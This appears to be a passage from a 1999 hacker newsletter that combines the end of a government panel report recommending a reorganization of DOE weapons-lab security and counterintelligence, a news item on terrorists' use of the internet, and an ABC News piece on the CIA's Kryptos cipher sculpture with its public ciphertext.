Albuquerque is but one of 11 such DOE Field Offices, that boast a total field complement of about 6,000. Back at DOE Headquarters, which has a total work force of close to 5,000, Sandia’s contracts are monitored, depending on the subject, by several Program Offices—including Defense Programs (somewhat over 100 officials) and Environmental Management (somewhat over 200 officials). We repeatedly heard from officials at various levels of DOE and the weapons labs how this convoluted and bloated management structure has constantly transmitted confusing and often contradictory mandates to the labs. This is vividly illustrated by the labyrinthine organizational charts that one must decipher to trace lines of authority. RESPONSIBILITY AND ACCOUNTABILITY IN SECURITY One senior CIA official told us that the NRO security system is the best in the government—a view echoed, we understand, in a forthcoming report by the DCI/Defense Secretary Joint Security Commission. One can see why. At the NRO, security starts at the top. The chief of security provides policy guidance and monitors implementation. However, from the Director on down, all line managers are responsible for implementation. If a security breach occurs, the Director and appropriate line subordinates all are accountable. Similarly, NRO contractors are expected to meet fully NRO security standards and guidelines. Failure to meet those guidelines could well result in forfeiture of performance award fees, at the least. FULL OPERATIONAL INTEGRATION To be effective, security must be more than a concept, it must be woven into every aspect of the agency’s business and the daily work of every employee. The NRO integrates security more fully than most other federal agencies we have seen. Though it has separate line items for security and counterintelligence functions, most security–related expenditures are integrated directly into the line items of every satellite program. Thus, rather than imposing security mandates as contract “add-ons,” security officials work with the NRO managers to fold their requirements into a given program during the planning stages. In this structure, security requirements are as much a part of an NRO satellite program as are solar cells and thrusters. And, the NRO security professionals, rather than treated as staff functionaries, are accepted as true partners in the NRO mission. A PREVAILING CONSCIOUSNESS Making people aware is vital. The record clearly shows that DOE has had mixed results from its various security and counterintelligence indoctrination programs. Briefings, town hall meetings and educational films are helpful, but they cannot take the place of a working environment in which security is just part of the daily routine. Again at the NRO, when a management decision is made, security always gets a voice. A security official is present at every level of NRO decision making: from the Office Director, to his Board of Directors, to the management teams of the smallest NRO program, security officials are part of the management process. Moreover, “security” gets a vote equal to that of any program manager. From the record, we judge that security at DOE, until recently, only occasionally had a voice; and when it did, many managers vociferously objected. Counterintelligence, on the other hand, was allowed little more than a whisper. RESTRUCTURING The panel is convinced that real and lasting security and counterintelligence reform at the weapons labs is simply unworkable within DOE’s current structure and culture. To achieve the kind of protection that these sensitive labs must have, they and their functions must have their own autonomous operational structure free of all the other obligations imposed by DOE management. We strongly believe that this cleaving can best be achieved by constituting a new government agency that is far more mission–focused and bureaucratically streamlined than its antecedent, and devoted principally to nuclear weapons and national security matters. The agency can be constructed in one of two ways. It could remain an element of DOE but become semi-autonomous—by that we mean strictly segregated from the rest of the department. This would be accomplished by having the agency director report only to the Secretary of Energy. The agency directorship also could be “dual-hatted” as an Under Secretary, thereby investing it with extra bureaucratic clout both inside and outside the department. We believe there are several good models for this course of action: the National Security Agency and the Defense Advanced Research Projects Agency, both elements of the Defense Department; and the National Oceanographic and Atmospheric Administration, an agency of the Commerce Department. Alternatively, the agency could be completely independent, with its administrator reporting directly to the President. The National Aeronautics and Space Administration and the National Science Foundation are also good models. Regardless of the mold in which this agency is cast, it must have staffing and support functions that are autonomous from the remaining operations at DOE. These functions, which report directly to the Director, must include: an inspector general; a general counsel; a human resources staff; a comptroller; a senior official responsible solely for security policy, and another responsible solely for counterintelligence policy. To protect its autonomy and avoid the diversion of funds to other purposes, the agency budget must be a separate line item strictly segregated by Congress from other budget pressures—even if it remains nominally within the current DOE structure. The agency also must have a separate employee career service. The panel recommends an “excepted service” model of employment, like many of the intelligence community elements, which would facilitate accountability and higher performance levels by allowing management to reward, punish, hire, and fire employees more easily. To ensure its long–term success, this new agency must be established by statute. That statute, moreover, must clearly stipulate that nothing less than an act of Congress can amend the agency’s mission, functions or affiliations. Clearly, Congress and the President must decide definitively which of these two solutions to enact. The panel has no specific preference between them; we believe either can be made effective. Should Congress and the President conclude that retaining the agency inside DOE is not workable, the “wholly-independent” approach should be enacted. We emphasize that it is very important for the new structure to be organized to preserve and, if possible, enhance the ability of the national weapons labs to attract and retain scientists of the highest caliber. Excellence in the caliber of the scientists and their research and development programs must be sustained if the weapons labs are to fulfill their missions in the front line of U.S. national security. To meet this goal, continued but carefully controlled interaction with foreign visitors and scientists from around the world as well as with researchers from DOE’s nondefense labs is essential for producing the best science. In the semi-autonomous model, the Secretary would be responsible for managing and ensuring the effectiveness of agency relations with the nonweapons labs. Whichever solution Congress enacts, we do feel strongly that the new agency never should be subordinated to the Defense Department. Defense already is populated with a number of semi–autonomous agencies; we see no reason to add to that burden. Moreover, we believe the decision made long ago to house America’s nuclear weapons research and development in a civilian government agency still makes sense. Specifically, we recommend that the Congress pass and the President sign legislation that: Creates a new, semi–autonomous Agency for Nuclear Stewardship (ANS), whose Director will report directly to the Secretary of Energy. The Director should be dual–hatted as an Under Secretary of Energy. This new agency will oversee all nuclear weapons–related matters previously housed in DOE, including Defense Programs and Nuclear Nonproliferation; it also will oversee all functions of the National Weapons labs. (If Congress opts to create a totally independent agency, the Director should report directly to the President.) Streamlines the ANS/Weapons Lab management structure by abolishing ties between the weapons labs and all DOE regional, field and site offices, and all contractor intermediaries. The so–called “GOCO,” or “government owned, contractor operated,” concept of lab management should be retained. GOCO has been very successful, particularly in providing employment conditions that attract scientists of the highest caliber, and the federal government is strongly committed to maintaining that working relationship. Even if DOE opts to retain these field entities for other purposes, the ANS should sever all association with them. All ANS/Weapons Lab communications and business should be handled by ANS Liaison Offices established in each lab and manned with a small staff. (Our short review time did not permit us to explore fully this issue. We doubt that any amount of time would be sufficient. Suffice it to say that we did learn enough about the costs and benefits of these myriad DOE field bureaucracies to persuade us to recommend cutting all ties between them and the new agency.) Mandates that the Director/ANS be appointed by the President with the consent of the Senate and, ideally, have an extensive background in national security, organizational management, and appropriate technical fields. Admittedly, finding an individual with solid credentials in all three areas may prove an elusive goal. However, meeting two out of those three criteria should be considered mandatory, provided that one of the criteria always met is management experience. The Deputy Director should have a background in an area that compensates for areas in which the Director lacks experience. The Director should serve for a minimum fixed term of 5 years, not coincident with quadrennial transitions of administrations, and be subject to removal only by Presidential direction. Stems the historical “revolving door” and management expertise problems at DOE by severely circumscribing the number of political appointees assigned to ANS and requiring all ANS senior political appointees to have strong backgrounds in both national security (intelligence, defense, or foreign policy) and management (corporate, government, or military). Ensures effective administration of safeguards, security, and counterintelligence at all the weapons labs and plants by creating a coherent security/CI structure within the new agency. We strongly recommend following the NRO’s model of security management. The senior CI official at ANS—we recommend a Special Assistant to the Director for CI policy—should be mandated as a permanent FBI senior executive service position. Abolishes the Office of Energy Intelligence. A Special Assistant to the ANS Director for Intelligence Liaison should be created within the new agency, with a staff of no more than 20. The Special Assistant should be responsible for managing relations with the intelligence community, briefing ANS senior management on intelligence matters, and ensuring ANS intelligence requirements are met. This office should follow the Treasury Department model. (The Secretary of Energy would not be precluded from establishing a similar special assistant to address the department’s non-weapons–related intelligence coordination and briefing needs.) Shifts the balance of analytic billets from the former Office of Energy Intelligence (about 40) to the DCI’s Nonproliferation Center to bolster intelligence community technical expertise on nuclear matters. These billets should be permanently funded by ANS, but permanently assigned to the DCI Center. Weapons lab employees and ANS civil servants should be temporarily assigned to these positions for two year tours. A Semi-Autonomous or Wholly Independent Nuclear Weapons Stewardship Agency should have the following attributes: The agency would be entirely separated from DOE, except in the semi-autonomous case, where the agency director—as a DOE Under Secretary—would report directly to the Secretary. The agency would have no other bureaucratic ties to DOE, other than R&D contracting, which would be managed by the agency Deputy Director. The weapons labs would be encouraged nonetheless to foster strong scientific interactions with the other DOE research labs. In the case of a wholly independent agency, the Director would be the chief executive officer. In the case of a semi-autonomous agency, the Director would be dual-hatted as a DOE Under Secretary. An independent oversight board would monitor performance and compliance to agency policies and guidelines, up and down the organizational structure. Authority from the agency Director to the weapons labs would run directly through the Deputy Director, who also would be dual-hatted as the Defense Programs Manager and, therefore, a manager of lab work. The security chief, directly reporting to the agency Director, would promulgate all security policies and guidelines for the agency and the weapons labs, including safeguards and cyber-security. The counterintelligence chief, also directly attached to the agency Director, would promulgate all counterintelligence policies and guidelines for the agency and the weapons labs. He/she also would manage the foreign visitors and assignments program. As Defense Programs Manager for the weapons labs, the agency Deputy Director would be responsible for ensuring the integration of all security and counterintelligence policies and guidelines into all weapons lab programs. Security officers and counterintelligence officers would be attached to all line offices, with heavy representation in Defense Programs, where full integration would occur. They also would be attached to all labs, in multiple numbers. Security and counterintelligence officers would report to their appropriate line managers on a day-to-day basis, but also report respectively to the agency security and counterintelligence chiefs on policy implementation issues. All policy implementation disputes would be referred back to the agency director for resolution. ADDITIONAL RECOMMENDATIONS There are a number of initiatives that must be undertaken immediately to start building a new agency culture and identity and restoring public confidence: Establish a clear mission and clear standards of excellence. The agency’s mission, and that each subordinate unit, must be clearly articulated. Strong security and counterintelligence in addition to scientific achievement must be core elements of the mission. Similarly, clear standards of excellence must be established throughout the organization. Excellence must be the goal of scientists, engineers, technicians, and managers as well as security and counterintelligence officials. Establish a clear chain of accountability. There must be clear, simple, indelible lines of accountability from top to bottom. If a failure occurs, there must be a straightforward means for determining accountability—at all levels. Seeking consensus and advice is important, but ultimately a decision must be made by individuals, and those individuals should be held accountable. Hold leaders accountable. Accountability must be enforced, particularly among the agency managers who will form the backbone of the new agency and instill a new culture of excellence. Reward achievement. Criteria should be clear and rewards substantial. Protection of nuclear secrets and expansion of scientific knowledge should be among the most valued. Achievement must be judged on contribution to mission, not to program expansions or budget increases. Punish failure ... with severity, if necessary. Penalties should be tough, but fair and proportional. Laxity in protecting nuclear secrets and other sensitive information should be among the most severely punished. Train and educate. Establish a formal educational and training system to develop a professional cadre of career managers and leaders. Security and counterintelligence should be major parts of the core curriculum passed down to all lab personnel in regular briefings and training sessions. Do not forget the primary mission. Preserve and strengthen those agency attributes—including cutting edge research in the most advanced scientific fields—that will attract the finest talent in the nation. With respect to the weapons laboratories, continue to foster their unparalleled lead in intellectual excellence. But never lose sight that protecting the nation by securing its nuclear stockpile and nuclear secrets—through good science and good management—is Job Number One. While maintaining its autonomy, the agency should nonetheless emphasize continued close scientific interaction with the DOE research labs not engaged in weapons–related endeavors. In the semi–autonomous alternative, DOE should also be responsible for ensuring that good relations are maintained between the non-weapons labs and the weapons labs. SECURITY AND COUNTERINTELLIGENCE ACCOUNTABILITY Accountability. The agency director should issue clear security accountability guidelines. The agency security chief must be accountable to the agency director for security policy at the labs, and the lab directors must be accountable to the agency director for compliance. The same system and process should be established to instill accountability among counterintelligence officials. Independent Oversight. Attentive, independent oversight will be critical to ensuring high standards of security and counterintelligence performance at the new agency. In that regard, we welcome Senator John Warner’s recent legislative initiative to create a small, dedicated panel to oversee security and counterintelligence performance at the weapons labs. This oversight should include an annual certification process. Joint Committee for Congressional Oversight of ANS/Labs. Congress should abolish its current oversight system for the national weapons labs. Just as the profligate morass of DOE contractors and bureaucrats has frustrated the critical national interest of safeguarding our nuclear stockpile, so has the current scheme of Congressional oversight with roughly 15 competing committees laying claim to some piece of the nuclear weapons mission. ANS Inspector General. The President, Congress, and the director of the new agency should cooperatively, through executive order, legislation, and agency directive, provide teeth to the authority of the new agency’s inspector general. For example, the inspector general, the independent oversight body, and the agency director should all have to concur on the findings of the annual report to the President on safeguards and security at the weapons labs. EXTERNAL RELATIONS The CIA and FBI should expand their “National Security Partnership” to include the new agency and the weapons labs. Reciprocal assignment programs should be implemented to promote cross-fertilization of expertise and experience. CIA and DIA should bolster their support for ANS needs. Both intelligence agencies should establish analytic accounts to support the specific substantive and counterintelligence interests and needs of the new ANS and the weapons labs. These accounts, among other issues, should regularly produce data on the nuclear–related collection efforts of all foreign governments and foreign intelligence services. This data should serve as the foundation for regularized weapons lab counterintelligence briefs for the foreign visits/foreign visitors programs. Improve national security and law enforcement cooperation, particularly with respect to counterintelligence case referrals and handling. The National Security Council should take the lead in establishing clear Executive Branch guidelines and procedures for resolving disputes between agencies over law enforcement and national security concerns. A government–wide process needs to be established by which competing interests can be adjudicated by officials who are properly informed of all relevant facts and circumstances, but who also are sufficiently senior to make decisions stick. Ensure a government–wide review of legal tools to address the current foreign intelligence threat. The National Security Council should conduct a review to ensure that sufficient legal authority and techniques are available and appropriate in light of the evolution of a very sophisticated threat and the ongoing revolution in information systems. PERSONNEL SECURITY An effective personnel security program. The agency director should immediately undertake a total revamping of the “Q” clearance program and look to the security elements in the intelligence community for advice and support. This review should result in a complete rewrite of existing guidance and standards for the issuing, revoking and suspending of security clearances. Special attention should be paid to establishing a clear—and relatively low—threshold for suspending clearances for cause, including pending criminal investigations. The review also should significantly strengthen the background investigation process by restructuring contracts to create incentives for thoroughness. We strongly advocate abolishing the prevalent method of paying investigators “by the case.” Strict “need–to–have” regulations should be issued for regular reviews of all contract employees clearance requirements. Those without a continuing need should have their clearances withdrawn. The National Security Council should review and resolve issues on a government–wide basis that permit a person who is under FBI investigation for suspected espionage to obtain a new or renewed clearance; existing standards for clearance renewal also should be reviewed with an eye toward tightening up. A professional administrative inquiry process. Promulgate new agency guidelines and standards for security–related administrative inquiries to ensure that proper security/counterintelligence procedures and methods are employed. Very high professional qualification standards should be established and strictly maintained for all security personnel involved in administrative inquiries. PHYSICAL/TECHNICAL/CYBERSECURITY Comprehensive weapons lab cyber–security program. Under the sponsorship and specific guidance of the agency Director, the weapons labs should institute a broad and detailed program to protect all computer workstations, networks, links and related systems from all forms of potential compromise. This program, which should be reviewed by and coordinated with appropriate offices within the U.S. intelligence community, must include standard network monitoring tools and uniform configuration management practices. All lab computers and networks must be constantly monitored and inspected for possible compromise, preferably by an agency–sponsored, independent auditing body. A “best practices” review should be conducted yearly by the appropriate agency security authority. Comprehensive classified document control system. Document controls for the most sensitive data of the weapons labs should be reinstituted by the agency Director. The program should be constantly monitored by a centralized agency authority to ensure compliance. A comprehensive classification review. The new agency, in coordination with the intelligence community, should promulgate new, concise, and precise classification guidance to define and ensure awareness of information and technologies that require protection. This guidance should clear up the widespread confusion over what is export–controlled information; what information, when joined with other data, becomes classified; and the differences between similarly named and seemingly boundless categories such as “unclassified controlled nuclear information” and “sensitive but unclassified nuclear information.” BUSINESS ISSUES Make security an integral part of doing business. Security compliance must be a major requirement in every agency contract with the weapons labs. Rather than a detailed list of tasks, the contract should make clear the security and counterintelligence standards by which the lab will be held accountable. It is the responsibility of the lab to develop the means to achieve those objectives. If a lab fails to conform to these standards and requirements, the agency should withhold performance award fees. Review the process for lab management contracts. If the agency director has reason to open the bidding for lab management contracts, we strongly recommend an intensive market research effort. Such an effort would help ensure that legitimate and competent bidders, with strong records for productive research and development, participate in the competition. Weapons labs foreign visitors program. This productive program should continue, but both the agency and the weapons labs, in concert, must ensure that secrets are protected. This means precise policy standards promulgated by the agency to ensure: the integrity of the secure areas and control over all foreign visitors and assignees; a clear demarcation between secure and open areas at the labs; strong enforcement of restrictions against sensitive foreign visitors and assignees having access to secure facilities; and sensible but firm guidelines for weapons lab employees’ contacts with foreign visitors from sensitive countries. Exceptions should be made by the agency director on a case–by–case basis. Clear, detailed standards should be enforced to determine whether foreign visits and appointments receive approval. The burden of proof should be placed on the employees who propose to host visitors from sensitive countries. Visits should be monitored by the labs and audited by an independent office. The bottom line: treat foreign visitors and assignees with the utmost courtesy, but assume they may well be collecting information for other governments. Foreign travel notification. The agency should institute a program whereby all agency and weapons lab employees in designated sensitive positions must make written notification of official and personal foreign travel well before departure. The agency must keep close records of these notifications and also ensure that effective counterintelligence briefings are provided to all such travelers. Unless formally granted an exception, scientists for weapons labs should travel in pairs on official visits to sensitive countries. Counterintelligence. The FBI should explore the possibility of expanding foreign counterintelligence resources in its field offices nearby the weapons labs. The panel offers additional thoughts for improving the Department’s CI efforts in the Classified Appendix to this report. ENDNOTES CHAPTER: ROOT CAUSES 1 The Department of Energy National Weapons Labs and Plants discussed in this report are: Lawrence Livermore National Lab, California; Los Alamos National Lab, New Mexico; Sandia National Lab, New Mexico; PANTEX Plant, Texas; Kansas City Plant, Missouri; Oak Ridge (Y-12) Plant, Tennessee. 2 Boyer, Paul. By the Bomb’s Early Light: American Thought and Culture at the Dawn of the Atomic Age. Chapel Hill: University of North Carolina Press, 1985, p. 138. 3 National Science Foundation, “Science and Engineering Indicators,” 1996. 4 National Science Foundation, “Data Brief,” Vol. 1996, No. 9, August 19, 1999. 5 Classified report. 6 Classified DOE Report. 7 DOE, “Annual Report to Congress, 1978,” April 1979. 8 U.S. Nuclear Command and Control System Support Staff, “Assessment Report: Department of Energy Nuclear Weapons-Related Security Oversight Process,” March 1998. CHAPTER: RECURRING VULNERABILITIES 1 U.S. Nuclear Command and Control System Support Staff, “Assessment Report: Department of Energy Nuclear Weapons-Related Security Oversight Process,” March 1998. 2 Classified DOE Report. 3 Classified DOE Report. 4 Classified DOE Report. 5 Classified DOE Report. 6 DOE, Office of Counterintelligence, “The Foreign Intelligence Threat to Department of Energy Personnel, Facilities and Research, Summary Report,” August 1990. 7 Classified U.S. Government report. 8 GAO/RCED-97-229, “Department of Energy: DOE Needs to Improve Controls Over Foreign Visitors to Weapons Laboratories,” September 25, 1997. 9 Hewlett, Richard G. and Francis Duncan, “Atomic Shield: A History of the U.S. Atomic Energy Commission,” May 1969. 10 Classified DOE report. 11 DOE, “Office of Safeguards and Security, Report to the Secretary: Status of Safeguards and Security,” February 1993. 12 Classified FBI document. 13 Classified U.S. Government report. 14 Classified DOE report. 15 DOE, “Office of Safeguards and Security, Status of Safeguards and Security, Fiscal Year 1993,” January 1994 (U). 16 DOE/IG-385, “Special Audit Report on the Department of Energy’s Arms and Military-Type Equipment,” February 1, 1996. 17 Classified DOE report. 18 DOE, “Annual Report to the President on the Status of Safeguards and Security at Domestic Nuclear Weapons Facilities,” September 1996. 19 GAO/RCED-91-12, “Nuclear Safety: Potential Security Weaknesses at Los Alamos and Other DOE Facilities,” October 1990 (U) and GAO/RCED-92-39, “Nuclear Security: Safeguards and Security Weaknesses at DOE’s Weapons Facilities,” December 13, 1991. 20 GAO/RCED-90-122, “Nuclear Security: DOE Oversight of Livermore’s Property Management System is Inadequate,” April 18, 1990. 21 GAO/”Key Factors Underlying Security Problems at DOE Facilities,” (Statement of Victor S. Rezendes, Director, Energy, Resources and Science Issues, Resources, Community, and Economic Development Division, GAO, in testimony before the Subcommittee on Oversight and Investigations, Committee on Commerce, House of Representatives), April 20, 1999. 22 GAO/”Key Factors Underlying Security Problems at DOE Facilities,” (Statement of Victor S. Rezendes, Director, Energy, Resources and Science Issues, Resources, Community, and Economic Development Division, GAO, in testimony before the Subcommittee on Oversight and Investigations, Committee on Commerce, House of Representatives), April 20, 1999. 23 Classified DOE report. 24 Hewlett, Richard G. and Francis Duncan, “Atomic Shield, A History of the United States Atomic Energy Commission,” May 1969. 25 GAO/RCED-89-34, “Nuclear Security: DOE Actions to Improve the Personnel Clearance Program,” November 9, 1988. 26 DOE/IG/WR-O-90-02, “Nevada Operations Office Oversight of Management and Operating Contractor Security Clearances,” March 1990. 27 Classified DOE report. 28 DOE/IG/WR-B-91-08, “Review of Contractor’s Personnel Security Clearances at DOE Field Office, Albuquerque,” September 1991. 29 DOE, “Office of Safeguards and Security, Report to the Secretary: Status of Safeguards and Security,” February 1993. 30 DOE, “Office of Safeguards and Security, Status of Safeguards and Security, Fiscal Year 1995,” January 1996. 31 Classified U.S. Government report. 32 Classified DOE report. 33 GAO/RCED-92-39, “Nuclear Security: Safeguards and Security Weaknesses at DOE Weapons Facilities,” December 13, 1991. 34 Classified DOE report. 35 Classified DOE report. 36 DOE, “Office of Safeguards and Security, Status of Safeguards and Security, Fiscal Year 1993,” January 1994 (U). 37 DOE, “Office of Safeguards and Security, Status of Safeguards and Security, Fiscal Year 1994,” January 1995 (U). 38 Classified DOE report. 39 Classified DOE report. 40 Classified DOE report. 41 Classified DOE report. 42 Classified DOE report. 43 New York Times, “Abstract,” August 5, 1977. 44 DOE, “Plutonium: The First 50 Years. United States Plutonium Production, Acquisition, and Utilization from 1944 Through 1994. 45 GAO/RCED-92-39, “Nuclear Security: Safeguards and Security Weaknesses at DOE’s Weapons Facilities,” December 13, 1991. 46 GAO/RCED/AIMD-95-5, “Nuclear Nonproliferation: U.S. International Nuclear Materials Tracking Capabilities are Limited,” December 27, 1994. 47 GAO/AIMD-95-165, “Department of Energy: Poor Management of Nuclear Materials Tracking Capabilities Are Limited,” August 3, 1995. 48 DOE, “Office of Safeguards and Security, Status of Safeguards and Security, Fiscal Year 1995,” January 1996. 49 U.S. Nuclear Command and Control System Support Staff, “Assessment Report: Department of Energy Nuclear Weapons-Related Security Oversight Process,” March 1998. 50 GAO/RCED-89-31, “Major Weaknesses in Foreign Visitor Controls at Weapons Laboratories,” October 11, 1988. 51 Classified U.S. Goverment report. 52 GAO/RCED-97-229, “Department of Energy: DOE Needs to Improve Controls Over Foreign Visitors to Weapons Laboratories,” September 25, 1997. 53 Classified DOE report. 54 GAO/RCED-97-229, “Department of Energy: DOE Needs to Improve Controls Over Foreign Visitors to Weapons Laboratories,” September 25, 1997 55 GAO/RCED-97-229, “Department of Energy: DOE Needs to Improve Controls Over Foreign Visitors to Weapons Laboratories,” September 25, 1997. 56 DOE, “Response to the Cox Committee Report: The Benefits of Department of Energy International Scientific and Technical Exchange Programs,” April 1999. 57 GAO/RCED-99-19, “Department of Energy: Problems in DOE’s Foreign Visitors Program Persist,” October 6, 1998. CHAPTER: ASSESSMENTS 1 In April 1997, the FBI Director met with Secretary Pena, who had taken office in March, to deliver a highly critical FBI assessment of DOE’s counterintelligence program. In June, DOE officials briefed the Special Assistant to the President and Senior Director for Nonproliferation and Export Controls. In July, the FBI Director and the Director of Central Intelligence expressed serious concern that DOE had not moved to implement the recommendations in the FBI report. 2 The National Counterintelligence Policy Board (NACIPB) was created by a 1994 Presidential Decision Directive to serve as the National Security Council’s primary mechanism to develop an effective national counterintelligence program. Current core NACIPB members include senior representatives from the Director of Central Intelligence /Central Intelligence Agency, the Federal Bureau of Investigation, the Department of Defense, the Department of State, the Department of Justice, the military departments’ CI organizations, the National Security Council, and, as of 1997, the Department of Energy and NSA. CHAPTER: REORGANIZATION 1 DOE, “Department of Energy First Tier Organizations, Terms of Office,” undated. 2 DOE, Field Fact Book, May 1998. 3 Unclassified organizational data provided by National Reconnaissance Office. [End] Conversion to HTML by JYA/Urban Deadline. See also PDF version of Unclassified Annex: http://jya.com/pfiab-appx.pdf @HWA 63.0 Terrorists Use the Net ~~~~~~~~~~~~~~~~~~~~~~ June 18th 1999 From HNN http://www.hackernews.com/ contributed by Anonymous Since everyone else does it terrorists do to. Terrorists are using the net as a means of communication, collaboration, and information dissemination. Sharing technology and spreading information to followers via the internet has become a necessary way of doing business. Web sites are new weapons terrorists are adding to their armory. A good quote from this article, "We cannot just make a law that will stop them from using it." Computer Currents http://www.currents.net/newstoday/99/06/15/news13.html Daily News Terrorism Via The Net By Erwin Lemuel G Oliva, Metropolitan Computer Times June 15, 1999 Almost every sector in society has exploited the Internet. Unfortunately, not everyone has good intentions. Terrorists now use the Internet as means of communication and collaboration, said Mike Coldrick, a bomb technician and anti-terrorism expert from Scotland Yard during the recent ASEAN Defense Technology Exchange forum in Manila. "Modern terrorists travel by jet plane, communicate to followers by satellite telephone, and recruit and spread messages via the Internet," Coldrick states in a paper he presented during the forum. Technology has changed the face of terrorist organizations. Coldrick noted, saying that there is growing evidence that terrorists are currently using the latest means of communication, such as the Internet, to disseminate terrorist literature and doctrine. In the same way, terrorist groups also use the Internet to transfer terrorist technology to other groups all over the world. "Lately, the Colombian revolutionary group, FARC, have produced stand off weapons and heavy mortars to a design very similar to those produced by the Provisional Irish Republican Army. No doubt this technology was passed on by PIRA-trained Basques (separatist group from Spain). Or did the Colombian group find it on the Internet?" asked Coldrick. Most often terrorist groups are able to create improvised explosive devices and other weaponry using locally available materials. In some instances, they buy them from international black markets. The latter, however, entails a lot of risk, said Coldrick. Coldrick laments that despite the advances in technology, terrorist groups' activities are not generally monitored due to legal issues such as privacy. "We cannot just make a law that will stop them from using it," he said. "It is important for people to exchange information about the activities of terrorists," he added. The International Association of Bomb Technicians and Investigators and the World Explosives Ordinance Disposal (EOD) Foundation, of which Coldrick is president, actively exchange e-mail and hold discussion groups over the Net. "In 41 years of my practice, I'll still find new things on the Internet," he remarked.Daily News Terrorism Via The Net By Erwin Lemuel G Oliva, Metropolitan Computer Times June 15, 1999 Almost every sector in society has exploited the Internet. Unfortunately, not everyone has good intentions. Terrorists now use the Internet as means of communication and collaboration, said Mike Coldrick, a bomb technician and anti-terrorism expert from Scotland Yard during the recent ASEAN Defense Technology Exchange forum in Manila. "Modern terrorists travel by jet plane, communicate to followers by satellite telephone, and recruit and spread messages via the Internet," Coldrick states in a paper he presented during the forum. Technology has changed the face of terrorist organizations. Coldrick noted, saying that there is growing evidence that terrorists are currently using the latest means of communication, such as the Internet, to disseminate terrorist literature and doctrine. In the same way, terrorist groups also use the Internet to transfer terrorist technology to other groups all over the world. "Lately, the Colombian revolutionary group, FARC, have produced stand off weapons and heavy mortars to a design very similar to those produced by the Provisional Irish Republican Army. No doubt this technology was passed on by PIRA-trained Basques (separatist group from Spain). Or did the Colombian group find it on the Internet?" asked Coldrick. Most often terrorist groups are able to create improvised explosive devices and other weaponry using locally available materials. In some instances, they buy them from international black markets. The latter, however, entails a lot of risk, said Coldrick. Coldrick laments that despite the advances in technology, terrorist groups' activities are not generally monitored due to legal issues such as privacy. "We cannot just make a law that will stop them from using it," he said. "It is important for people to exchange information about the activities of terrorists," he added. The International Association of Bomb Technicians and Investigators and the World Explosives Ordinance Disposal (EOD) Foundation, of which Coldrick is president, actively exchange e-mail and hold discussion groups over the Net. "In 41 years of my practice, I'll still find new things on the Internet," he remarked. @HWA 64.0 Beat the CIA at their own game? - crypto sculpture cracking ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ June 18th 1999 From HNN http://www.hackernews.com/ CIA Crypto Sculpture contributed by lamer There is an encoded sculpture in the Langley courtyard, and now there is a public challenge to see if someone in the general public can crack the code before the CIA (of course, they have had a 10 year head start). ABC News http://www.abcnews.go.com/onair/WorldNewsTonight/wnt9990615_ciacode.html By John Martin ABCNEWS.com L A N G L E Y, Va., June 15 — Behind the Central Intelligence Agency’s headquarters, there’s a secret message waiting to be decoded. To the delight of its creator, artist Jim Sanborn of Washington, the message remains a mystery to the agency and the hundreds of employees who relax in the courtyard where his sculpture stands. “I don’t know that it will ever be totally figured out,” says Sanborn. Only William Webster, CIA director at the time the sculpture was erected, was given the decoded text, and he locked it in the office safe when he left the agency in 1991. A Break in the Case But finally, after all these years, there’s been a break. An analyst at the agency has deciphered part of the message. In fact, he’s deciphered two parts of the message. The CIA public affairs office is quick to point out that each employee works to unravel the puzzle on his own time. Presumably, the agency’s computers, or those of the code-breaking National Security Agency, could unlock the message in a matter of hours or days. David Stein, a 38-year-old CIA physicist, working at home nights and weekends for about 400 hours, has deciphered all but 97 of the letters. This is part of what he deciphered: “They used the earth’s magnetic field. The information was gathered and transmitted underground to an unknown location.” What location? If you know the code, the coordinates are there. “Thirty-eight degrees, 57 minutes, 6.5 seconds, north. 77 degrees, 8 minutes, 44 minutes west. ID’ed by rows,” reads Stein. That is the approximate location of the sculpture. We showed retired CIA cryptographer Ed Scheidt Stein’s work. Scheidt says Stein is on the right track. And he should know — Scheidt is the one who taught the artist how to encode his message. As to the section Stein hasn’t been able to solve, Scheidt says, “That’s still a secret.” And that’s how the sculptor wants it. “I think it’s important that every piece of artwork holds one’s attention for as long as possible,” says Sanborn. Still, after nine years, the veil has been pulled back slightly. But the mystery continues, and the CIA says it still wants the message deciphered, if only to show it enjoys the challenge. Your Turn We invite you to try cracking the code. You can see the full code at the bottom of this page. Mull it over and then post your guesses on the message board above or use the board to discuss things with fellow cryptographers. And then we will see whether one of our readers can accomplish what the CIA has not in nearly a decade. Need a Hint? We have posted a partial transcript with an interview Stein to help you. Each day we will post a portion of what Stein has already deciphered. Look for it at the bottom of the yellow box. The Full Code Left Side EMUFPHZLRFAXYUSDJKZLDKRNSHGNFIVJ YQTQUXQBQVYUVLLTREVJYQTMKYRDMFD VFPJUDEEHZWETZYVGWHKKQETGFQJNCE GGWHKK?DQMCPFQZDQMMIAGPFXHQRLG TIMVMZJANQLVKQEDAGDVFRPJUNGEUNA QZGZLECGYUXUEENJTBJLBQCRTBJDFHRR YIZETKZEMVDUFKSJHKFWHKUWQLSZFTI HHDDDUVH?DWKBFUFPWNTDFIYCUQZERE EVLDKFEZMOQQJLTTUGSYQPFEUNLAVIDX FLGGTEZ?FKZBSFDQVGOGIPUFXHHDRKF FHQNTGPUAECNUVPDJMQCLQUMUNEDFQ ELZZVRRGKFFVOEEXBDMVPNFQXEZLGRE DNQFMPNZGLFLPMRJQYALMGNUVPDXVKP DQUMEBEDMHDAFMJGZNUPLGEWJLLAETG ENDYAHROHNLSRHEOCPTEOIBIDYSHNAIA CHTNREYULDSLLSLLNOHSNOSMRWXMNE TPRNGATIHNRARPESLNNELEBLPIIACAE WMTWNDITEENRAHCTENEUDRETNHAEOE TFOLSEDTIWENHAEIOYTEYQHEENCTAYCR EIFTBRSPAMHHEWENATAMATEGYEERLB TEEFOASFIOTUETUAEOTOARMAEERTNRTI BSEDDNIAAHTTMSTEWPIEROAGRIEWFEB AECTDDHILCEIHSITEGOEAOSDDRYDLORIT RKLMLEHAGTDHARDPNEOHMGFMFEUHE ECDMRIPFEIMEHNLSSTTRTVDOHW?OBKR UOXOGHULBSOLIFBBWFLRVQQPRNGKSSO TWTQSJQSSEKZZWATJKLUDIAWINFBNYP VTTMZFPKWGDKZXTJCDIGKUHUAUEKCAR Right side ABCDEFGHIJKLMNOPQRSTUVWXYZABCD AKRYPTOSABCDEFGHIJLMNQUVWXZKRYP BRYPTOSABCDEFGHIJLMNQUVWXZKRYPT CYPTOSABCDEFGHIJLMNQUVWXZKRYPTO 